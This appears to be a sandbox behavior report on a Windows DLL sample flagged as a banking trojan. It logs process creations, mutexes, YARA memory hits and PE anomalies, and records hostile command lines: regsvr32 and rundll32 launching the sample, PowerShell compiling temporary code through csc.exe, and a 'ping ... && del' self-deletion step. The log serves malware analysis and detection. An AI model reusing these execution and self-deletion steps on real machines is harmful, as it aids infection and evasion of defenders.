            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2E65.tmp" "c:\Users\user\AppData\Local\Temp\CSC7E62D986CCD14293A1B1D71B70775B41.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3848.tmp" "c:\Users\user\AppData\Local\Temp\CSCCBF2AAC487274BF4B5441EA2B445AE92.TMP"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqvogmwc.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pwlcj2cu.cmdline
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A3A.tmp" "c:\Users\user\AppData\Local\Temp\CSC176C1CB9788E4426ACAF7B271AB13B4.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C6C.tmp" "c:\Users\user\AppData\Local\Temp\CSC1CA052A85412AB8DCD9B872B5234E.TMP"
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\61f113091fd0c.dll
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\explorer.exe | Process created: unknown unknown
            Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20220126\PowerShell_transcript.124406.bcfkRUYJ.20220126102824.txt
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_npkgel2o.x34.ps1
            Source: classification engine | Classification label: mal100.bank.troj.evad.winDLL@76/57@0/2
            Source: C:\Windows\System32\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_01C12130 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,1_2_01C12130
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_01
            Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{749A14DC-4303-C6CF-6DE8-275AF19C4B2E}
            Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{24E56635-33EE-F65D-DD98-178A614C3B5E}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{D43C1FA8-2382-2681-4D48-07BAD1FC2B8E}
            Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{F4526350-C361-469C-ED68-A7DA711CCBAE}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{D0842125-EF91-8296-F904-93D63D78776A}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{E8190BB2-27B4-5AA3-F19C-4B2EB590AF42}
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6216:120:WilError_01
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{F8CD5B50-F738-EA41-41AC-1BBE05A07FD2}
            Source: C:\Windows\SysWOW64\regsvr32.exe Mutant created: \Sessions\1\BaseNamedObjects\{18963B60-9722-0ADF-E1CC-BBDEA5C01FF2}
            Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{54F96618-A314-A6F1-CDC8-873A517CAB0E}
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1284:120:WilError_01
            Source: C:\Windows\System32\loaddll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{9C95EA6E-4BB4-2EFD-B590-AF42B9C45396}
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4556:120:WilError_01
            Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: 61f113091fd0c.dll Static file information: File size 1062256 > 1048576
            Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000001.00000003.455695462.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.440284992.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.454013508.0000000006360000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.435436816.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.429285803.00000000064C0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.439095932.0000000006110000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000001.00000003.455695462.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.440284992.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.454013508.0000000006360000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.435436816.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.429285803.00000000064C0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.439095932.0000000006110000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_01C17D50 push ecx; ret 1_2_01C17D59
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_01C180BF push ecx; ret 1_2_01C180CF
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00DC06F5 push dword ptr [ebp-00000284h]; ret 1_2_00DC0764
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00DC0880 push dword ptr [ebp-00000284h]; ret 1_2_00DC08B6
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00DC0AB8 push edx; ret 1_2_00DC0B11
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00DC0A64 push edx; ret 1_2_00DC0B11
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00DC0A64 push dword ptr [esp+10h]; ret 1_2_00DC0BFB
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00DC05DF push dword ptr [ebp-00000284h]; ret 1_2_00DC087F
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00DC0BFC push dword ptr [esp+0Ch]; ret 1_2_00DC0C10
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00DC0BFC push dword ptr [esp+10h]; ret 1_2_00DC0C56
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_046E7347 push ecx; ret 1_2_046E7357
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_031F7D50 push ecx; ret 3_2_031F7D59
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_031F80BF push ecx; ret 3_2_031F80CF
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_04BE6DD0 push ecx; ret 3_2_04BE6DD9
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_04BE7347 push ecx; ret 3_2_04BE7357
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_011205DF push dword ptr [ebp-00000284h]; ret 4_2_0112087F
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_01120880 push dword ptr [ebp-00000284h]; ret 4_2_011208B6
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_011206F5 push dword ptr [ebp-00000284h]; ret 4_2_01120764
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_01120AB8 push edx; ret 4_2_01120B11
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_01120BFC push dword ptr [esp+0Ch]; ret 4_2_01120C10
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_01120BFC push dword ptr [esp+10h]; ret 4_2_01120C56
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_01120A64 push edx; ret 4_2_01120B11
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_01120A64 push dword ptr [esp+10h]; ret 4_2_01120BFB
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_05EC7347 push ecx; ret 4_2_05EC7357
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_01057D50 push ecx; ret 5_2_01057D59
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_010580BF push ecx; ret 5_2_010580CF
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_00EB06F5 push dword ptr [ebp-00000284h]; ret 5_2_00EB0764
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_00EB0AB8 push edx; ret 5_2_00EB0B11
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_00EB0880 push dword ptr [ebp-00000284h]; ret 5_2_00EB08B6
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_00EB0A64 push edx; ret 5_2_00EB0B11
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_00EB0A64 push dword ptr [esp+10h]; ret 5_2_00EB0BFB
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_046D653E LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,1_2_046D653E
            Source: sjfy431f.dll.25.dr Static PE information: real checksum: 0x0 should be: 0x5cc9
            Source: 61f113091fd0c.dll Static PE information: real checksum: 0x10f3d0 should be: 0x103870
            Source: tpt0a0ul.dll.34.dr Static PE information: real checksum: 0x0 should be: 0x3700
            Source: oyq1c2cj.dll.27.dr Static PE information: real checksum: 0x0 should be: 0xd902
            Source: pwlcj2cu.dll.46.dr Static PE information: real checksum: 0x0 should be: 0xd21c
            Source: pqvogmwc.dll.45.dr Static PE information: real checksum: 0x0 should be: 0x217c
            Source: oeprcmty.dll.41.dr Static PE information: real checksum: 0x0 should be: 0x740b
            Source: ugg3o5nf.dll.33.dr Static PE information: real checksum: 0x0 should be: 0x6d4b
            Source: 0hsihch1.dll.39.dr Static PE information: real checksum: 0x0 should be: 0x34a3
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\61f113091fd0c.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sjfy431f.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oyq1c2cj.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ugg3o5nf.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tpt0a0ul.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hsihch1.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oeprcmty.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqvogmwc.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pwlcj2cu.cmdline
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\pqvogmwc.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\ugg3o5nf.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\sjfy431f.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\0hsihch1.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\pwlcj2cu.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\oyq1c2cj.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\tpt0a0ul.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\oeprcmty.dll

            Hooking and other Techniques for Hiding and Protection

            Source: Yara match File source: 00000005.00000003.311254885.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.365747529.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.318724371.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.319004486.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000003.313620006.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.318536421.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000020.00000003.461902284.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.318886527.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000003.310802933.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.318950101.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.318813278.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000003.357803374.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000003.416632245.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000003.360636522.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000001F.00000003.462719900.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000003.311195582.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000003.310405280.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000003.310678862.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000003.313789835.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000003.416948546.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000003.357904969.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000003.310826841.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000003.311031834.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000001F.00000003.462876303.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000003.311387225.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000003.418907434.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000003.310564493.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000003.311048648.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000003.311384342.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000003.418190503.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000003.418488620.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.318621591.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000003.313081553.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000003.312190736.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000003.310688564.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000003.358039219.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000003.311319683.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000003.310571881.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000020.00000003.461973969.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000003.419037087.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000003.310907059.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000003.359673745.0000000001F7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000003.312479873.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.370947214.000000000540C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000003.360822217.000000000536C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.319064007.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000001F.00000003.463098635.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000003.310393039.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000003.313276698.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000003.313441363.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000003.312864720.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000020.00000003.461743717.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000003.419113309.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6248, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 6100, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4768, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5376, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: control.exe PID: 3360, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: control.exe PID: 3088, type: MEMORYSTR
            Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\61f113091fd0c.dll
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exe    Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
